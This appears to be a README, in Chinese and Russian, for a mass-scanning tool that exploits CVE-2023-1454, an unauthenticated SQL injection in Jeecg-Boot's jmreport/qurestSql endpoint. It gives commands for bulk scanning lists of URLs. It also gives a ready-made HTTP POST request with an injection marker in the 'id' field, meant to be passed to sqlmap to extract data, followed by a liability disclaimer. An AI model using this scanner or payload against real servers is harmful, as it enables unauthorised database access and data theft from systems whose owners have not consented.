
CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测
jmreport/qurestSql неавторизованное массовое сканирование SQL-инъекций poc Jeecg-Boot — это быстрая платформа разработки на основе Spring Boot и Jeecg-Boot-Plus. В последней версии jeecg-boot 3.5.0 были обнаружены множественные уязвимости SQL-инъекций.
Оригинальный инструмент имел высокую частоту ложных срабатываний, поэтому были изменены условия проверки и попутно оптимизирован код.
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 тест одного URL
python3 CVE-2023-1454-scan.py -f url.txt массовое сканирование
После завершения сканирования в текущей директории будет создан файл vuln.txt с URL-адресами, содержащими уязвимости.
poc:

exp:
Сохраните пакет данных в формате txt, затем с помощью sqlmap можно получить данные.
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

Любые прямые или косвенные последствия и убытки, возникшие в результате распространения или использования информации, предоставленной в данном документе, несет сам пользователь. Автор не несет за это никакой ответственности.